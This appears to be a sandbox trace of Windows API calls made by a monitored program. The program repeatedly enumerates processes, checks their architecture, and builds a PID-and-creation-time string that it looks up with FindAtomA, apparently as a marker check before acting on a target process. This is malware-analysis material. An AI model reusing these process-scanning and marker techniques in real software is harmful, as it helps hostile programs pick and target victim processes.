	[0081.524] CloseHandle (hObject=0x36c) returned 1
	[0081.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x36c
	[0081.524] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.524] CloseHandle (hObject=0x36c) returned 1
	[0081.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x36c
	[0081.524] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.524] CloseHandle (hObject=0x36c) returned 1
	[0081.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x36c
	[0081.525] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.525] CloseHandle (hObject=0x36c) returned 1
	[0081.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x36c
	[0081.525] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.525] CloseHandle (hObject=0x36c) returned 1
	[0081.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x36c
	[0081.525] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.525] CloseHandle (hObject=0x36c) returned 1
	[0081.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x36c
	[0081.525] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.525] CloseHandle (hObject=0x36c) returned 1
	[0081.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x36c
	[0081.525] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.525] CloseHandle (hObject=0x36c) returned 1
	[0081.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x36c
	[0081.525] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.525] CloseHandle (hObject=0x36c) returned 1
	[0081.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x36c
	[0081.526] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.526] CloseHandle (hObject=0x36c) returned 1
	[0081.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x36c
	[0081.526] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.526] CloseHandle (hObject=0x36c) returned 1
	[0081.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x36c
	[0081.526] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.526] CloseHandle (hObject=0x36c) returned 1
	[0081.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0081.526] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.526] CloseHandle (hObject=0x36c) returned 1
	[0081.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0081.526] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.527] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.527] GetProcessTimes (in: hProcess=0x36c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.527] wsprintfA (in: param_1=0x73e980, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.527] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.527] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.527] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.527] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.527] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.527] CloseHandle (hObject=0x36c) returned 1
	[0081.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x36c
	[0081.528] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.528] CloseHandle (hObject=0x36c) returned 1
	[0081.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x388
	[0081.601] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.601] CloseHandle (hObject=0x388) returned 1
	[0081.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x388
	[0081.601] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.601] CloseHandle (hObject=0x388) returned 1
	[0081.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x388
	[0081.601] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.601] CloseHandle (hObject=0x388) returned 1
	[0081.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x388
	[0081.601] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.601] CloseHandle (hObject=0x388) returned 1
	[0081.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x388
	[0081.601] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.602] CloseHandle (hObject=0x388) returned 1
	[0081.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x388
	[0081.602] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.602] CloseHandle (hObject=0x388) returned 1
	[0081.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x388
	[0081.602] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.602] CloseHandle (hObject=0x388) returned 1
	[0081.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x388
	[0081.602] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.602] CloseHandle (hObject=0x388) returned 1
	[0081.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x388
	[0081.602] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.602] CloseHandle (hObject=0x388) returned 1
	[0081.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x388
	[0081.602] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.602] CloseHandle (hObject=0x388) returned 1
	[0081.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x388
	[0081.602] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.603] CloseHandle (hObject=0x388) returned 1
	[0081.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x388
	[0081.603] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.603] CloseHandle (hObject=0x388) returned 1
	[0081.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x388
	[0081.603] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.603] CloseHandle (hObject=0x388) returned 1
	[0081.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x388
	[0081.603] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.603] CloseHandle (hObject=0x388) returned 1
	[0081.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x388
	[0081.603] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.603] CloseHandle (hObject=0x388) returned 1
	[0081.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x388
	[0081.603] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.603] CloseHandle (hObject=0x388) returned 1
	[0081.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x388
	[0081.604] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.604] CloseHandle (hObject=0x388) returned 1
	[0081.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x388
	[0081.610] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.611] CloseHandle (hObject=0x388) returned 1
	[0081.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x388
	[0081.611] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.611] CloseHandle (hObject=0x388) returned 1
	[0081.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x388
	[0081.611] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.611] CloseHandle (hObject=0x388) returned 1
	[0081.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x388
	[0081.611] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.611] CloseHandle (hObject=0x388) returned 1
	[0081.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x388
	[0081.611] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.611] CloseHandle (hObject=0x388) returned 1
	[0081.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x388
	[0081.611] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.611] CloseHandle (hObject=0x388) returned 1
	[0081.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x388
	[0081.612] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.612] CloseHandle (hObject=0x388) returned 1
	[0081.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x388
	[0081.612] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.612] CloseHandle (hObject=0x388) returned 1
	[0081.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x388
	[0081.612] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.612] CloseHandle (hObject=0x388) returned 1
	[0081.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x388
	[0081.612] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.612] CloseHandle (hObject=0x388) returned 1
	[0081.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x388
	[0081.612] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.612] CloseHandle (hObject=0x388) returned 1
	[0081.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x388
	[0081.612] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.612] CloseHandle (hObject=0x388) returned 1
	[0081.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x388
	[0081.613] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.613] CloseHandle (hObject=0x388) returned 1
	[0081.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x388
	[0081.613] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.613] CloseHandle (hObject=0x388) returned 1
	[0081.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x388
	[0081.613] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.613] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.613] GetProcessTimes (in: hProcess=0x388, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.614] wsprintfA (in: param_1=0x745500, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.614] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.614] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.614] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.614] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.614] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.614] CloseHandle (hObject=0x388) returned 1
	[0081.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x388
	[0081.615] IsWow64Process (in: hProcess=0x388, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.615] CloseHandle (hObject=0x388) returned 1
	[0081.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x39c
	[0081.666] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.666] CloseHandle (hObject=0x39c) returned 1
	[0081.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x39c
	[0081.666] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.666] CloseHandle (hObject=0x39c) returned 1
	[0081.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x39c
	[0081.666] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.667] CloseHandle (hObject=0x39c) returned 1
	[0081.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x39c
	[0081.667] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.667] CloseHandle (hObject=0x39c) returned 1
	[0081.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x39c
	[0081.667] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.667] CloseHandle (hObject=0x39c) returned 1
	[0081.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x39c
	[0081.667] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.667] CloseHandle (hObject=0x39c) returned 1
	[0081.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x39c
	[0081.667] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.667] CloseHandle (hObject=0x39c) returned 1
	[0081.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x39c
	[0081.667] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.667] CloseHandle (hObject=0x39c) returned 1
	[0081.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x39c
	[0081.668] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.668] CloseHandle (hObject=0x39c) returned 1
	[0081.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x39c
	[0081.668] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.668] CloseHandle (hObject=0x39c) returned 1
	[0081.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x39c
	[0081.668] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.668] CloseHandle (hObject=0x39c) returned 1
	[0081.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x39c
	[0081.668] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.668] CloseHandle (hObject=0x39c) returned 1
	[0081.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x39c
	[0081.668] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.668] CloseHandle (hObject=0x39c) returned 1
	[0081.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x39c
	[0081.668] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.668] CloseHandle (hObject=0x39c) returned 1
	[0081.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x39c
	[0081.669] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.669] CloseHandle (hObject=0x39c) returned 1
	[0081.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x39c
	[0081.669] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.669] CloseHandle (hObject=0x39c) returned 1
	[0081.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x39c
	[0081.669] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.669] CloseHandle (hObject=0x39c) returned 1
	[0081.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x39c
	[0081.669] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.669] CloseHandle (hObject=0x39c) returned 1
	[0081.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x39c
	[0081.669] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.669] CloseHandle (hObject=0x39c) returned 1
	[0081.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x39c
	[0081.669] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.669] CloseHandle (hObject=0x39c) returned 1
	[0081.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x39c
	[0081.670] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.670] CloseHandle (hObject=0x39c) returned 1
	[0081.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x39c
	[0081.670] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.670] CloseHandle (hObject=0x39c) returned 1
	[0081.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x39c
	[0081.670] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.670] CloseHandle (hObject=0x39c) returned 1
	[0081.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x39c
	[0081.670] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.670] CloseHandle (hObject=0x39c) returned 1
	[0081.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x39c
	[0081.670] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.670] CloseHandle (hObject=0x39c) returned 1
	[0081.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x39c
	[0081.670] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.670] CloseHandle (hObject=0x39c) returned 1
	[0081.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x39c
	[0081.670] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.671] CloseHandle (hObject=0x39c) returned 1
	[0081.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x39c
	[0081.671] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.671] CloseHandle (hObject=0x39c) returned 1
	[0081.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x39c
